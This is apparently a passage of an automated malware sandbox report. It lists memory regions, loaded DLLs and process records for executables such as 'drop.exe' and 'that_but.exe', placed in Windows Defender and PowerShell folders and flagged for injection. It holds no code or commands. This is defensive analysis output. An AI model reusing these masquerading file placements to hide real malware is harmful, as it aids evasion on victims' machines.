region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2953 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 2954 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 2955 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2956 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 2957 start_va = 0xb20000 end_va = 0xbdbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 2958 start_va = 0xca0000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 2959 start_va = 0x1150000 end_va = 0x1166fff monitored = 0 entry_point = 0x11514a1 region_type = mapped_file name = "drop.exe" filename = "\\Program Files\\Windows Media Player\\drop.exe" (normalized: "c:\\program files\\windows media player\\drop.exe") Region: id = 2960 start_va = 0x1170000 end_va = 0x256ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 2961 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2962 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2963 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2964 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2965 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2966 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2967 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2968 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2969 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2970 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2971 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2972 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2973 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2974 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2975 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2976 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2977 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2978 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2979 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2980 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2981 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2982 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2983 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2984 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2985 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2986 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 155 os_tid = 0xc8c Thread: id = 156 os_tid = 0xda8 Process: id = "17" image_name = "that_but.exe" filename = "c:\\program files\\windows defender\\that_but.exe" page_root = "0xec72000" os_pid = "0xc94" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows Defender\\that_but.exe\" " cur_dir = "C:\\Program Files\\Windows Defender\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3035 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3036 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3037 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3038 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3039 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3040 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3041 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3042 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3043 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3044 start_va = 0x1d0000 end_va = 0x28dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3045 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 3046 start_va = 0x2e0000 end_va = 0x2e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 3047 start_va = 0x330000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3048 start_va = 0x360000 end_va = 0x376fff monitored = 0 entry_point = 0x3614a1 region_type = mapped_file name = "that_but.exe" filename = "\\Program Files\\Windows Defender\\that_but.exe" (normalized: "c:\\program files\\windows defender\\that_but.exe") Region: id = 3049 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3050 start_va = 0x780000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 3051 start_va = 0x7a0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 3052 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 3053 start_va = 0x990000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 3054 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 3055 start_va = 0xc20000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 3056 start_va = 0x2020000 end_va = 0x20dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 3057 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3058 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3059 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3060 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3061 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3062 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3063 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3064 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3065 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3066 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3067 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3068 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3069 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3070 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3071 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3072 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3073 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3074 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3075 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3076 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3077 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3078 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3079 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3080 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3081 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3082 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 157 os_tid = 0xec0 Thread: id = 158 os_tid = 0x394 Process: id = "18" image_name = "knowledge sign.exe" filename = "c:\\program files (x86)\\windows multimedia platform\\knowledge sign.exe" page_root = "0x74028000" os_pid = "0x89c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\knowledge sign.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Multimedia Platform\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2987 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2988 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2989 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2990 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2991 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2992 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2993 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2994 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2995 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2996 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2997 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2998 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2999 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3000 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3001 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 3002 start_va = 0x730000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 3003 start_va = 0x830000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 3004 start_va = 0x9c0000 end_va = 0xb40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 3005 start_va = 0xb50000 end_va = 0xc0bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 3006 start_va = 0xc40000 end_va = 0xc4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 3007 start_va = 0xdc0000 end_va = 0xdd6fff monitored = 0 entry_point = 0xdc14a1 region_type = mapped_file name = "knowledge sign.exe" filename = "\\Program Files (x86)\\Windows Multimedia Platform\\knowledge sign.exe" (normalized: "c:\\program files (x86)\\windows multimedia platform\\knowledge sign.exe") Region: id = 3008 start_va = 0xde0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 3009 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3010 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3011 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3012 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3013 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3014 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3015 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3016 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3017 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3018 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3019 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3020 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3021 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3022 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3023 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3024 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3025 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3026 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3027 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3028 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3029 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3030 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3031 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3032 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3033 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3034 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 159 os_tid = 0x1004 Thread: id = 160 os_tid = 0xb18 Process: id = "19" image_name = "raiseleftbuy.exe" filename = "c:\\program files (x86)\\windowspowershell\\raiseleftbuy.exe" page_root = "0x5a381000" os_pid = "0x1028" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\raiseleftbuy.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], 